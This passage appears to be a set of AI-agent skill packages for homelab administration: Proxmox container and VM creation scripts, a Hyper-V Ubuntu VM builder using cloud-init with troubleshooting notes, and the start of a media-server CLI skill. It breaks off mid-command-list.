| CPU | Intel Core Ultra 9 285 |
| RAM | 32GB |
| Bridge | vmbr0 (DHCP) |
## Resource Budget
| Resource | Total | Used | Free |
|----------|-------|------|------|
| CPU cores | 24 | ~14 | ~10 |
| RAM | 32GB | ~22GB | ~10GB |
| Disk (LVM) | ~800GB | ~30GB | ~770GB |
## Existing Containers (as of March 2026)
| CTID | Name | Purpose | Notes |
|------|------|---------|-------|
| 100 | adguard | DNS ad blocking | |
| 101 | twingate-connector | Zero-trust VPN | |
| 102 | crafty-controller | Minecraft server | |
| 103 | homarr | Dashboard | |
| 105 | wazuh | SIEM | 99.3% disk full! |
| 109 | social-automation | n8n + Postiz | |
**Next CTID: 110+** (always verify with `pct list`)
## LXC Defaults
| Parameter | Default |
|-----------|---------|
| OS template | ubuntu-24.04-standard_24.04-2_amd64.tar.zst |
| Cores | 2 |
| RAM | 4096 MB |
| Disk | 8 GB |
| Network | eth0, vmbr0, DHCP |
| Unprivileged | Yes |
| Nesting | Yes (for Docker) |
## VM Defaults
| Parameter | Default |
|-----------|---------|
| OS | Ubuntu 24.04 cloud-init |
| Cores | 2 |
| RAM | 4096 MB |
| Disk | 20 GB |
| SCSI | virtio-scsi-pci |
| Network | virtio, vmbr0, DHCP |
| User | deploy |
FILE:references/gotchas.md
# Gotchas: Proxmox VM/Container Creation
## Docker in LXC Requires Nesting
- Without `--features nesting=1`, Docker fails to create overlay networks
- **Fix:** Always include `--features nesting=1` when the container will run Docker
- Unprivileged + nesting is the safe default
## LXC Can't Run Everything
- No custom kernel modules (iptables works, but kernel-level packet capture doesn't)
- No AF_PACKET raw sockets (needed by Zeek, Security Onion, tcpdump with advanced features)
- No /dev access for specialized hardware
- **Fix:** Use `qm` (full VM) instead of `pct` (LXC) for these use cases
## Template Caching
- `pveam download local <template>` is slow on first download (~2-5 min depending on connection)
- Always check `pveam list local` first to see if the template is cached
- Template name for Ubuntu 24.04: `ubuntu-24.04-standard_24.04-2_amd64.tar.zst`
## CTID/VMID Conflicts
- Proxmox uses numeric IDs for both containers (CTID) and VMs (VMID) in the same namespace
- **Fix:** Always check both `pct list` and `qm list` before picking an ID
- Use max(all IDs) + 1 for safety
## Disk Thin Provisioning
- Proxmox reports ~770GB free in the LVM pool
- But individual containers can fill up fast, especially logging and DB-heavy services
- Wazuh container (CTID 105) is at 99.3% / 25GB. Don't colocate storage-heavy services
- **Fix:** Monitor with `pct exec <CTID> -- df -h` and resize with `pct resize <CTID> rootfs +10G`
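The monitoring step can be scripted so that nearly full containers are flagged automatically. A minimal sketch, assuming the POSIX `df -P` column layout (capacity in column 5, mount point in column 6); `over_threshold` is a hypothetical helper name.

```bash
# over_threshold LIMIT: read `df -P` output on stdin and print "<mount> <use>%"
# for every filesystem at or above LIMIT percent. Hypothetical helper.
over_threshold() {
  local limit=${1:-90}
  awk -v limit="$limit" '
    NR > 1 {                      # skip the df header row
      use = $5
      sub(/%/, "", use)
      if (use + 0 >= limit + 0) print $6, use "%"
    }'
}
```

For example, `ssh proxmox-host "pct exec 105 -- df -P /" | over_threshold 90` prints a line only when the root filesystem is at least 90% full.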
## LXC Root Access
- LXC containers default to root user (no separate user created)
- Access via `pct exec <CTID> -- bash` or SSH as root
- VMs use cloud-init with a deploy user
## Container Startup
- LXC containers boot in ~5 seconds
- Full VMs with cloud-init take ~60-90 seconds
- Template download (if needed) adds 2-5 minutes
## Network
- All containers/VMs on `vmbr0` bridge with DHCP
- IP assigned by network DHCP server
- For static IPs, use `--net0 name=eth0,bridge=vmbr0,ip=192.168.x.x/24,gw=192.168.x.1`
FILE:scripts/create-lxc.sh
#!/bin/bash
# Create an LXC container on Proxmox with Docker support
# Usage: ./create-lxc.sh <proxmox-host> <name> [cores] [ram-mb] [disk-gb]
set -euo pipefail
HOST="${1:?Usage: $0 <proxmox-host> <name> [cores] [ram-mb] [disk-gb]}"
NAME="${2:?Usage: $0 <proxmox-host> <name> [cores] [ram-mb] [disk-gb]}"
CORES="${3:-2}"
RAM="${4:-4096}"
DISK="${5:-8}"
TEMPLATE="ubuntu-24.04-standard_24.04-2_amd64.tar.zst"
echo "=== Creating LXC: $NAME on $HOST ==="
echo " Cores: $CORES | RAM: ${RAM}MB | Disk: ${DISK}GB"
# Ensure template is cached
echo "[1/5] Checking template..."
if ! ssh "$HOST" "pveam list local" 2>/dev/null | grep -q "$TEMPLATE"; then
echo " Downloading template (this may take a few minutes)..."
ssh "$HOST" "pveam download local $TEMPLATE"
else
echo " Template cached."
fi
# Find next CTID
echo "[2/5] Finding next CTID..."
CTID=$(ssh "$HOST" "{ pct list 2>/dev/null | tail -n +2 | awk '{print \$1}'; qm list 2>/dev/null | tail -n +2 | awk '{print \$1}'; } | sort -n | tail -1")
CTID=$(( ${CTID:-99} + 1 )) # Proxmox IDs start at 100, so an empty host yields 100
echo " Using CTID: $CTID"
# Create container
echo "[3/5] Creating container..."
ssh "$HOST" "pct create $CTID local:vztmpl/$TEMPLATE \
--hostname $NAME \
--memory $RAM \
--cores $CORES \
--rootfs local-lvm:$DISK \
--net0 name=eth0,bridge=vmbr0,ip=dhcp \
--unprivileged 1 \
--features nesting=1 \
--start 1"
# Wait for boot
echo "[4/5] Waiting for boot..."
sleep 10
# Get IP
echo "[5/5] Getting IP..."
IP=$(ssh "$HOST" "pct exec $CTID -- hostname -I 2>/dev/null" | awk '{print $1}')
echo ""
echo "=== LXC Created ==="
echo "Name: $NAME"
echo "CTID: $CTID"
echo "IP: ${IP:-pending (check in a few seconds)}"
echo "Access: ssh $HOST \"pct exec $CTID -- bash\""
echo ""
echo "Next: Run post-boot-setup.sh to install Docker"
FILE:scripts/create-vm.sh
#!/bin/bash
# Create a full VM on Proxmox with cloud-init
# Usage: ./create-vm.sh <proxmox-host> <name> <password> [cores] [ram-mb] [disk-gb]
set -euo pipefail
HOST="${1:?Usage: $0 <proxmox-host> <name> <password> [cores] [ram-mb] [disk-gb]}"
NAME="${2:?Usage: $0 <proxmox-host> <name> <password> [cores] [ram-mb] [disk-gb]}"
PASSWORD="${3:?Usage: $0 <proxmox-host> <name> <password> [cores] [ram-mb] [disk-gb]}"
CORES="${4:-2}"
RAM="${5:-4096}"
DISK="${6:-20}"
echo "=== Creating VM: $NAME on $HOST ==="
echo " Cores: $CORES | RAM: ${RAM}MB | Disk: ${DISK}GB"
# Find next VMID
echo "[1/4] Finding next VMID..."
VMID=$(ssh "$HOST" "{ pct list 2>/dev/null | tail -n +2 | awk '{print \$1}'; qm list 2>/dev/null | tail -n +2 | awk '{print \$1}'; } | sort -n | tail -1")
VMID=$(( ${VMID:-99} + 1 )) # Proxmox IDs start at 100, so an empty host yields 100
echo " Using VMID: $VMID"
# Download cloud image if needed
echo "[2/4] Checking cloud image..."
ssh "$HOST" "ls /var/lib/vz/template/iso/ubuntu-24.04-cloud.img 2>/dev/null" || {
echo " Downloading cloud image..."
ssh "$HOST" "wget -q https://cloud-images.ubuntu.com/releases/24.04/release/ubuntu-24.04-server-cloudimg-amd64.img -O /var/lib/vz/template/iso/ubuntu-24.04-cloud.img"
}
# Create VM
echo "[3/4] Creating VM..."
ssh "$HOST" "qm create $VMID --name $NAME --memory $RAM --cores $CORES \
--net0 virtio,bridge=vmbr0 --scsihw virtio-scsi-pci \
--ide2 local-lvm:cloudinit --serial0 socket --vga serial0 \
--ciuser deploy --cipassword '$PASSWORD' --ipconfig0 ip=dhcp"
# Import the cloud image as the boot disk (scsi0), then grow it to the requested size.
# A bare `qm importdisk` only adds an unused disk, so the VM would boot from an empty volume.
ssh "$HOST" "qm set $VMID --scsi0 local-lvm:0,import-from=/var/lib/vz/template/iso/ubuntu-24.04-cloud.img --boot order=scsi0"
ssh "$HOST" "qm resize $VMID scsi0 ${DISK}G"
# Start
echo "[4/4] Starting VM..."
ssh "$HOST" "qm start $VMID"
echo ""
echo "=== VM Created ==="
echo "Name: $NAME"
echo "VMID: $VMID"
echo "User: deploy / $PASSWORD"
echo "Wait ~90 seconds for cloud-init, then check IP"
FILE:scripts/destroy.sh
#!/bin/bash
# Destroy a Proxmox container or VM
# Usage: ./destroy.sh <proxmox-host> <ctid-or-vmid> [type: lxc|vm]
set -euo pipefail
HOST="${1:?Usage: $0 <proxmox-host> <id> [lxc|vm]}"
ID="${2:?Usage: $0 <proxmox-host> <id> [lxc|vm]}"
TYPE="${3:-lxc}"
echo "=== Destroying $TYPE $ID on $HOST ==="
if [ "$TYPE" = "lxc" ]; then
ssh "$HOST" "pct stop $ID 2>/dev/null; pct destroy $ID --purge"
elif [ "$TYPE" = "vm" ]; then
ssh "$HOST" "qm stop $ID 2>/dev/null; qm destroy $ID --purge"
else
echo "ERROR: Type must be 'lxc' or 'vm'"
exit 1
fi
echo "=== $TYPE $ID destroyed ==="
FILE:scripts/find-ip.sh
#!/bin/bash
# Get IP address of a Proxmox container or VM
# Usage: ./find-ip.sh <proxmox-host> <id> [type: lxc|vm]
set -euo pipefail
HOST="${1:?Usage: $0 <proxmox-host> <id> [lxc|vm]}"
ID="${2:?Usage: $0 <proxmox-host> <id> [lxc|vm]}"
TYPE="${3:-lxc}"
IP="" # initialised so an unknown type does not trip `set -u` below
if [ "$TYPE" = "lxc" ]; then
IP=$(ssh "$HOST" "pct exec $ID -- hostname -I 2>/dev/null" | awk '{print $1}')
elif [ "$TYPE" = "vm" ]; then
IP=$(ssh "$HOST" "qm guest cmd $ID network-get-interfaces 2>/dev/null" | grep -oP '"ip-address"\s*:\s*"\K[0-9.]+' | head -1)
if [ -z "$IP" ]; then
echo "VM guest agent not responding. Try ARP scan:"
echo " arp -a | grep the VM's MAC address"
exit 1
fi
fi
if [ -n "$IP" ]; then
echo "$IP"
else
echo "Could not determine IP. The container/VM may still be booting."
exit 1
fi
FILE:scripts/post-boot-setup.sh
#!/bin/bash
# Install Docker + Compose v2 inside a Proxmox LXC container
# Usage: ./post-boot-setup.sh <proxmox-host> <ctid> [extra-packages]
set -euo pipefail
HOST="${1:?Usage: $0 <proxmox-host> <ctid> [extra-packages]}"
CTID="${2:?Usage: $0 <proxmox-host> <ctid> [extra-packages]}"
EXTRA="${3:-}"
echo "=== Post-boot setup for CTID $CTID ==="
echo "[1/3] Installing base packages..."
ssh "$HOST" "pct exec $CTID -- bash -c '
export DEBIAN_FRONTEND=noninteractive
apt-get update -qq
apt-get install -y -qq docker.io curl git htop $EXTRA
'"
echo "[2/3] Installing Docker Compose v2..."
ssh "$HOST" "pct exec $CTID -- bash -c '
systemctl enable docker
systemctl start docker
mkdir -p /usr/local/lib/docker/cli-plugins
curl -SL https://github.com/docker/compose/releases/latest/download/docker-compose-linux-x86_64 -o /usr/local/lib/docker/cli-plugins/docker-compose
chmod +x /usr/local/lib/docker/cli-plugins/docker-compose
'"
echo "[3/3] Verifying..."
ssh "$HOST" "pct exec $CTID -- docker --version"
ssh "$HOST" "pct exec $CTID -- docker compose version"
echo ""
echo "=== Setup complete for CTID $CTID ==="
Create Ubuntu 24.04 VMs on Windows Hyper-V from cloud images with cloud-init. Handles all the gotchas: sparse VHDX fix, hv_netvsc network config, permissions...
---
name: hyperv-create-vm
version: 1.0.0
description: "Create Ubuntu 24.04 VMs on Windows Hyper-V from cloud images with cloud-init. Handles all the gotchas: sparse VHDX fix, hv_netvsc network config, permissions, Secure Boot, and Docker Compose v2. Returns a Docker-ready VM with SSH access."
tags:
- hyper-v
- vm
- ubuntu
- cloud-init
- infrastructure
- automation
- windows
category: infrastructure
requires:
  env:
    - name: VM_PASSWORD
      description: "Password for the VM's deploy user. Read via env var or stdin (never CLI args)."
      required: false
  credentials:
    - name: SSH access to Hyper-V host
      description: "SSH key or password auth to the Windows Hyper-V host for remote PowerShell execution."
      required: true
    - name: Hyper-V admin privileges
      description: "The SSH user must be able to run elevated PowerShell (Hyper-V cmdlets, fsutil, icacls)."
      required: true
  tools:
    - name: genisoimage
      description: "Required on the Linux build host to create cloud-init ISOs."
      install: "apt install genisoimage"
    - name: qemu-img
      description: "Required on the Windows Hyper-V host for qcow2-to-VHDX conversion."
      install: "choco install qemu -y"
files:
- SKILL.md
- README.md
- scripts/build-cidata-iso.sh
- scripts/create-vm.ps1
- scripts/destroy-vm.ps1
- scripts/find-vm-ip.ps1
- scripts/cloud-init-user-data.yaml
- scripts/cloud-init-meta-data.yaml
- scripts/cloud-init-network-config.yaml
- references/defaults.md
- references/gotchas.md
---
# Hyper-V VM Creator
Create Ubuntu 24.04 VMs on Windows Hyper-V from cloud images with cloud-init. Returns a Docker-ready VM with SSH access.
## When to Use
- "create hyper-v vm"
- "spin up vm on hyper-v"
- "new hyper-v ubuntu vm"
- Any time you need a fresh Linux VM on a Windows Hyper-V host
This is a **base skill**. It creates the VM. Other skills (soc-deploy-thehive, soc-deploy-misp) deploy applications onto it.
## User Inputs
| Parameter | Default | Required |
|-----------|---------|----------|
| VM name | - | Yes |
| Hyper-V host | hyperv-host (YOUR_HYPERV_IP) | No |
| CPU cores | 2 | No |
| RAM | 4GB | No |
| Disk | 40GB | No |
| VM user password | (generated) | No |
| Extra cloud-init packages | - | No |
| Network switch | DNS-NIC-Switch | No |
## Prerequisites Check
```bash
# SSH to Hyper-V host
ssh hyperv-host "echo OK" 2>/dev/null || echo "FAIL: Cannot SSH to Hyper-V host"
# qemu-img on Windows
ssh hyperv-host 'where "C:\Program Files\qemu\qemu-img.exe"' 2>/dev/null || echo "FAIL: qemu-img not installed (choco install qemu -y)"
# genisoimage on Linux (for building cloud-init ISO)
which genisoimage || echo "FAIL: genisoimage not installed (apt install genisoimage)"
```
## Execution Flow
### Step 1: Build cloud-init ISO (on Linux)
```bash
# Password via env var (recommended, avoids shell history/process list exposure)
VM_PASSWORD="<password>" bash scripts/build-cidata-iso.sh <vm-name> [ssh-public-key]
# Or via stdin
echo "<password>" | bash scripts/build-cidata-iso.sh <vm-name> [ssh-public-key]
# Creates /tmp/<vm-name>-cidata.iso
```
The ISO contains three files:
- `user-data`: deploy user, Docker, Compose v2, SSH key access (password SSH login is disabled by default)
- `meta-data`: instance-id and hostname
- `network-config`: hv_netvsc DHCP match (CRITICAL for Hyper-V networking)
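Since cloud-init runs only once, it can help to check the three seed files before building the ISO. The following is a minimal pre-flight sketch; `check_cidata_dir` is a hypothetical helper, not part of `build-cidata-iso.sh`, and it only checks for presence and the `#cloud-config` header.

```bash
# check_cidata_dir DIR: verify the three seed files exist before building the ISO.
# Hypothetical pre-flight helper; prints each problem and returns non-zero if any.
check_cidata_dir() {
  local dir=$1 rc=0 f
  for f in user-data meta-data network-config; do
    [ -s "$dir/$f" ] || { echo "missing or empty: $f" >&2; rc=1; }
  done
  # cloud-init only treats user-data as cloud-config when the first line says so
  if [ -s "$dir/user-data" ] && [ "$(head -n 1 "$dir/user-data")" != "#cloud-config" ]; then
    echo "user-data must start with #cloud-config" >&2
    rc=1
  fi
  return "$rc"
}
```

It could be called as `check_cidata_dir /tmp/<vm-name>-cidata` just before the `genisoimage` step.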
### Step 2: Transfer files to Hyper-V host
```bash
# Cloud image (if not already cached)
wget -q https://cloud-images.ubuntu.com/releases/24.04/release/ubuntu-24.04-server-cloudimg-amd64.img -O /tmp/ubuntu-24.04-cloud.img
scp /tmp/ubuntu-24.04-cloud.img hyperv-host:C:/Users/youruser/Downloads/
# Cloud-init ISO
scp /tmp/<vm-name>-cidata.iso hyperv-host:C:/Users/youruser/Downloads/
```
### Step 3: Create VM (elevated PowerShell on Hyper-V host)
```bash
# Copy script to host
scp scripts/create-vm.ps1 hyperv-host:C:/Users/youruser/Downloads/
# Execute (needs elevation)
ssh hyperv-host "powershell -ExecutionPolicy Bypass -File C:\\Users\\youruser\\Downloads\\create-vm.ps1 \
-VMName <vm-name> \
-CloudInitISO C:\\Users\\youruser\\Downloads\\<vm-name>-cidata.iso \
-DiskSizeGB <disk> -MemoryGB <ram> -CPUCount <cores>"
```
### Step 4: Wait for boot and find IP
```bash
sleep 90 # Cloud-init needs ~90 seconds
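# Hyper-V VMs have MACs starting with 00-15-5d
# (Linux arp prints colons, Windows arp prints dashes, so match either)
arp -a | grep -iE "00[-:]15[-:]5d"
# Get VM MAC to match
ssh hyperv-host "powershell (Get-VMNetworkAdapter -VMName '<vm-name>').MacAddress"
# PowerShell shows: 00155D38010A
# ARP shows: 00-15-5d-38-01-0a (Windows) or 00:15:5d:38:01:0a (Linux)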
```
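Matching the PowerShell MAC against ARP output by eye is error-prone, so the conversion can be scripted. A minimal sketch: `format_mac` is a hypothetical helper that normalises any common MAC notation to lowercase pairs joined by a chosen separator.

```bash
# format_mac MAC [SEP]: normalise a MAC address to lowercase pairs joined by SEP.
# Hypothetical helper; SEP defaults to ":" (Linux arp), pass "-" for Windows arp output.
format_mac() {
  local raw sep=${2:-:} out i
  raw=$(printf '%s' "$1" | tr 'A-F' 'a-f' | tr -cd '0-9a-f')
  [ "${#raw}" -eq 12 ] || return 1   # a MAC is exactly 12 hex digits
  out=${raw:0:2}
  for (( i = 2; i < 12; i += 2 )); do
    out+="$sep${raw:i:2}"
  done
  printf '%s\n' "$out"
}
```

With the MAC from `Get-VMNetworkAdapter` stored in `$MAC`, a lookup might be `arp -a | grep -i "$(format_mac "$MAC")"`.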
### Step 5: Verify SSH and Docker
```bash
ssh deploy@<ip> "docker --version && docker compose version && echo 'VM READY'"
```
### Return Values
Report to caller:
```
VM Created: <vm-name>
IP: <ip>
SSH: deploy@<ip> (key auth; password <password> is for console login)
Docker: installed
Docker Compose v2: installed
```
## Teardown
To destroy a VM completely:
```bash
ssh hyperv-host "powershell -Command \"Stop-VM -Name '<vm-name>' -Force -TurnOff; Remove-VM -Name '<vm-name>' -Force; Remove-Item 'C:\\ProgramData\\Microsoft\\Windows\\Virtual Hard Disks\\<vm-name>.vhdx' -Force\""
```
Or use `scripts/destroy-vm.ps1`:
```bash
scp scripts/destroy-vm.ps1 hyperv-host:C:/Users/youruser/Downloads/
ssh hyperv-host "powershell -ExecutionPolicy Bypass -File C:\\Users\\youruser\\Downloads\\destroy-vm.ps1 -VMName <vm-name>"
```
## Critical Gotchas
See `references/gotchas.md` for full details. Top blockers:
1. **Sparse VHDX**: `fsutil sparse setflag <path> 0` BEFORE `Resize-VHD` or error 0xC03A001A
2. **Network config**: Must include `match: driver: hv_netvsc` or VM gets no IP
3. **Permissions**: `icacls /grant "NT VIRTUAL MACHINE\Virtual Machines:(F)"` or Start-VM fails
4. **Secure Boot Off**: Ubuntu cloud images aren't signed for Hyper-V
5. **Cloud-init runs once**: No redo. Delete VM + VHDX and start over
6. **Don't batch PowerShell**: Run Hyper-V commands one at a time
7. **All commands need elevated PowerShell**
8. **Docker Compose v2**: Install via curl in runcmd, NOT apt
9. **IP discovery**: Use ARP scan, not Get-VMNetworkAdapter (needs linux-tools-virtual)
FILE:README.md
# hyperv-create-vm
Create Ubuntu 24.04 VMs on Windows Hyper-V from cloud images with cloud-init. Handles all the gotchas (sparse VHDX, network config, permissions, Compose v2). Returns a Docker-ready VM with SSH access.
## What It Does
Reusable VM creation skill. Creates the infrastructure, doesn't deploy applications. Pair with:
- `soc-deploy-thehive` for TheHive + Cortex
- `soc-deploy-misp` for MISP
- Any Docker-based deployment
## Automation Includes
- Ubuntu cloud image download and VHDX conversion
- Sparse flag fix (the #1 Hyper-V gotcha)
- Cloud-init ISO with Docker, Compose v2, SSH access
- hv_netvsc network config (mandatory for Hyper-V)
- VM creation, permissions, and startup
- IP discovery via ARP scan
- SSH verification
## Requirements
- SSH access to a Windows Hyper-V host
- `qemu-img` on the Hyper-V host (`choco install qemu -y`)
- `genisoimage` on the agent's Linux host
## Tags
hyper-v, vm, ubuntu, cloud-init, infrastructure, automation, windows
FILE:references/defaults.md
# Defaults: Hyper-V VM Creation
## VM Specs
| Parameter | Default | Notes |
|-----------|---------|-------|
| OS | Ubuntu 24.04 LTS | Cloud image (qcow2) |
| Generation | 2 | Required for UEFI boot |
| CPU | 2 cores | |
| RAM | 4 GB | |
| Disk | 40 GB | |
| Network switch | DNS-NIC-Switch | |
| VM user | deploy | |
| Secure Boot | Off | Cloud images unsigned |
| Auto checkpoints | Off | Prevents disk bloat |
## File Paths (Hyper-V Host)
| Item | Path |
|------|------|
| Cloud image cache | `C:\Users\youruser\Downloads\ubuntu-24.04-cloud.img` |
| VHDX storage | `C:\ProgramData\Microsoft\Windows\Virtual Hard Disks\` |
| Cloud-init ISOs | `C:\Users\youruser\Downloads\` |
| qemu-img | `C:\Program Files\qemu\qemu-img.exe` |
## Cloud Image URL
```
https://cloud-images.ubuntu.com/releases/24.04/release/ubuntu-24.04-server-cloudimg-amd64.img
```
## Installed via Cloud-Init
- docker.io
- curl
- git
- htop
- Docker Compose v2 plugin (via curl, not apt)
- SSH password auth disabled (key-only by default)
FILE:references/gotchas.md
# Gotchas: Hyper-V VM Creation
## VHDX Sparse Flag (Showstopper)
- `qemu-img convert` creates VHDX with NTFS sparse attribute
- Hyper-V refuses to start or resize sparse VHDX (error `0xC03A001A`)
- **Fix:** `fsutil sparse setflag "<path>.vhdx" 0` BEFORE Resize-VHD
- **Order matters:** sparse removal -> resize -> permissions -> create VM
## Cloud-Init Network Config (Showstopper)
- Hyper-V NICs use the `hv_netvsc` driver
- Interface names vary between image versions (eth0, ens1, etc.)
- Without a network-config file, VM boots with zero networking
- **Fix:** Match by driver, not interface name:
```yaml
version: 2
ethernets:
  id0:
    match:
      driver: hv_netvsc
    dhcp4: true
```
## File Permissions
- Hyper-V service account needs explicit VHDX access
- **Fix:** `icacls "<path>.vhdx" /grant "NT VIRTUAL MACHINE\Virtual Machines:(F)"`
- Without this, Start-VM fails with "Access denied"
## Secure Boot
- Ubuntu cloud images aren't signed for Hyper-V Secure Boot
- **Fix:** `Set-VMFirmware -VMName <name> -EnableSecureBoot Off`
## Cloud-Init Runs Once
- If cloud-init completes (even with errors), it won't re-run on reboot
- No "retry" mechanism exists
- **Fix:** Delete VM, delete VHDX, reconvert from cloud image, start over
## PowerShell Batching
- Running multiple Hyper-V cmdlets in rapid succession causes intermittent failures
- **Fix:** Execute one command at a time with error checking between each
## Elevated PowerShell Required
- All Hyper-V commands and `fsutil` need admin elevation
- For automation, use: `powershell -ExecutionPolicy Bypass -File script.ps1`
## Docker Compose v2
- Cloud-init must install Compose v2 plugin via curl, NOT via apt
- `apt install docker-compose` installs v1 which is broken with modern images
- **Fix:** curl the compose plugin binary into `/usr/local/lib/docker/cli-plugins/`
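When pinning the plugin version, the download URL can be built from the release tag and CPU architecture. This is a sketch under stated assumptions: `compose_plugin_url` is a hypothetical helper, and it assumes the release assets follow the `docker-compose-linux-<arch>` naming used by the pinned URL in `cloud-init-user-data.yaml`.

```bash
# compose_plugin_url VERSION [ARCH]: build the release URL for the Compose v2 plugin.
# Hypothetical helper; ARCH defaults to `uname -m`, VERSION is a tag such as v2.32.4.
compose_plugin_url() {
  local version=$1 arch=${2:-$(uname -m)}
  case "$arch" in
    x86_64|aarch64) ;;        # asset names match uname -m for these
    arm64) arch=aarch64 ;;    # some systems report arm64
    *) echo "unsupported arch: $arch" >&2; return 1 ;;
  esac
  printf 'https://github.com/docker/compose/releases/download/%s/docker-compose-linux-%s\n' \
    "$version" "$arch"
}
```

For example: `curl -SL "$(compose_plugin_url v2.32.4)" -o /usr/local/lib/docker/cli-plugins/docker-compose`.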
## IP Discovery
- `(Get-VMNetworkAdapter -VMName <name>).IPAddresses` returns empty without guest integration services
- Cloud images don't have `linux-tools-virtual` or `hyperv-daemons` installed
- **Fix:** ARP scan: `arp -a | grep -iE "00[-:]15[-:]5d"` and match MAC from PowerShell
- PowerShell MAC format: `00155D38010A`, ARP format: `00-15-5d-38-01-0a` (Windows) or `00:15:5d:38:01:0a` (Linux)
FILE:scripts/build-cidata-iso.sh
#!/bin/bash
# Build cloud-init ISO for Hyper-V VM
# Usage: VM_PASSWORD=<pass> ./build-cidata-iso.sh <vm-name> [ssh-public-key] [extra-packages]
# Or: echo <pass> | ./build-cidata-iso.sh <vm-name> [ssh-public-key] [extra-packages]
#
# Password is read from VM_PASSWORD env var or stdin to avoid exposure
# in process lists and shell history.
set -euo pipefail
VM_NAME="${1:?Usage: VM_PASSWORD=<pass> $0 <vm-name> [ssh-public-key] [extra-packages]}"
SSH_KEY="${2:-$(cat ~/.ssh/id_ed25519.pub 2>/dev/null || echo 'NO_KEY')}"
EXTRA_PKGS="${3:-}"
# Read password from env var or stdin (never CLI args)
if [ -n "${VM_PASSWORD:-}" ]; then
PASSWORD="$VM_PASSWORD"
elif [ ! -t 0 ]; then
read -r PASSWORD
else
read -rsp "VM password: " PASSWORD
echo
fi
if [ -z "$PASSWORD" ]; then
echo "ERROR: No password provided. Set VM_PASSWORD or pipe via stdin." >&2
exit 1
fi
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
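WORK_DIR="/tmp/${VM_NAME}-cidata"
OUTPUT="/tmp/${VM_NAME}-cidata.iso"
echo "Building cloud-init ISO for: $VM_NAME"
# Generate password hash (password passed via the environment, not interpolated into the Python code)
# Note: the crypt module was removed in Python 3.13; `openssl passwd -6 -stdin` is an alternative there.
PASS_HASH=$(PASSWORD="$PASSWORD" python3 -c "import crypt, os; print(crypt.crypt(os.environ['PASSWORD'], crypt.mksalt(crypt.METHOD_SHA512)))")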
# Create working directory
rm -rf "$WORK_DIR"
mkdir -p "$WORK_DIR"
# Generate user-data from template
sed \
-e "s|VM_NAME_PLACEHOLDER|${VM_NAME}|g" \
-e "s|PASSWORD_HASH_PLACEHOLDER|${PASS_HASH}|g" \
-e "s|SSH_KEY_PLACEHOLDER|${SSH_KEY}|g" \
"$SCRIPT_DIR/cloud-init-user-data.yaml" > "$WORK_DIR/user-data"
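# Add extra packages if specified. Insert them under the packages: key; appending to the
# end of the file would land after ssh_pwauth. Assumes the template indents entries by two spaces.
if [ -n "$EXTRA_PKGS" ]; then
  for pkg in $(echo "$EXTRA_PKGS" | tr ',' ' '); do
    awk -v pkg="$pkg" '{ print } /^packages:/ { print "  - " pkg }' "$WORK_DIR/user-data" > "$WORK_DIR/user-data.tmp"
    mv "$WORK_DIR/user-data.tmp" "$WORK_DIR/user-data"
  done
fi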
# Generate meta-data from template
sed "s|VM_NAME_PLACEHOLDER|${VM_NAME}|g" \
"$SCRIPT_DIR/cloud-init-meta-data.yaml" > "$WORK_DIR/meta-data"
# Copy network config
cp "$SCRIPT_DIR/cloud-init-network-config.yaml" "$WORK_DIR/network-config"
# Build ISO
genisoimage -output "$OUTPUT" -volid cidata -joliet -rock \
"$WORK_DIR/user-data" "$WORK_DIR/meta-data" "$WORK_DIR/network-config"
echo "ISO created: $OUTPUT"
echo "SCP to Hyper-V host: scp $OUTPUT hyperv-host:C:/Users/youruser/Downloads/"
FILE:scripts/cloud-init-meta-data.yaml
instance-id: VM_NAME_PLACEHOLDER-001
local-hostname: VM_NAME_PLACEHOLDER
FILE:scripts/cloud-init-network-config.yaml
version: 2
ethernets:
  id0:
    match:
      driver: hv_netvsc
    dhcp4: true
    dhcp6: false
FILE:scripts/cloud-init-user-data.yaml
#cloud-config
hostname: VM_NAME_PLACEHOLDER
manage_etc_hosts: true
users:
  - name: deploy
    sudo: ALL=(ALL) NOPASSWD:ALL
    shell: /bin/bash
    lock_passwd: false
    passwd: PASSWORD_HASH_PLACEHOLDER
    ssh_authorized_keys:
      - SSH_KEY_PLACEHOLDER
packages:
  - docker.io
  - curl
  - git
  - htop
runcmd:
  - systemctl enable docker
  - systemctl start docker
  - usermod -aG docker deploy
  - mkdir -p /usr/local/lib/docker/cli-plugins
  # Pin Compose version for reproducibility. Update this when upgrading.
  - curl -SL "https://github.com/docker/compose/releases/download/v2.32.4/docker-compose-linux-x86_64" -o /usr/local/lib/docker/cli-plugins/docker-compose
  - chmod +x /usr/local/lib/docker/cli-plugins/docker-compose
# SSH password auth disabled by default for security (key-only access).
# Set to true only if you need password-based SSH login.
ssh_pwauth: false
Single-file bash CLI for the *arr media stack with SSH remote support. For agents running on a different machine than the media services (e.g., VPS agent man...
---
name: media-cli
version: 1.0.0
description: "Single-file bash CLI for the *arr media stack with SSH remote support. For agents running on a different machine than the media services (e.g., VPS agent managing a home server). Tunnels API calls through existing SSH config so services stay on localhost and are never exposed. If your agent and services are on the same machine, use media-cli-local instead."
tags:
- media
- sonarr
- radarr
- plex
- jellyfin
- torrents
- automation
- homelab
- arr
category: tools
---
# media-cli: Terminal Control for Your *arr Media Stack (Remote)
One bash script to manage your entire media automation stack from a remote machine. Search, add, download, and monitor movies and TV shows without touching a web UI.
Built for setups where the AI agent runs on a different host than the media services (e.g., a VPS running OpenClaw managing a home server's *arr stack). If everything runs on the same machine, use [media-cli-local](https://clawhub.com/solomonneas/media-cli-local) instead.
**Source:** https://github.com/solomonneas/media-cli
**Install:** Clone the repo and run the install script, or copy the `media` file to your PATH manually. See the GitHub README for details.
## Supported Services
| Service | Required | What It Does |
|---------|----------|-------------|
| Sonarr | Yes | TV show management |
| Radarr | Yes | Movie management |
| Prowlarr | Yes | Indexer management |
| qBittorrent | Yes | Download monitoring |
| Bazarr | Optional | Subtitles |
| Jellyseerr | Optional | User requests + trending |
| Tdarr | Optional | Transcode monitoring |
## Setup
```bash
# Install (clone and review the script first)
git clone https://github.com/solomonneas/media-cli.git
cd media-cli
bash install.sh
# Configure (interactive wizard)
media setup
# Test
media status
```
The setup wizard asks for API URLs and keys, saves to `~/.config/media-cli/config` (chmod 600).
## Commands
### Movies
```bash
media movies search "Interstellar"   # Search online
media movies add "Interstellar"      # Add + start downloading
media movies list                    # Library with download status
media movies missing                 # Monitored without files
media movies remove "title"          # Remove (keeps files)
```
### TV Shows
```bash
media shows search "Breaking Bad"    # Search online
media shows add "Breaking Bad"       # Add + search episodes
media shows list                     # Library with episode counts
```
### Downloads
```bash
media downloads                        # All torrents by state
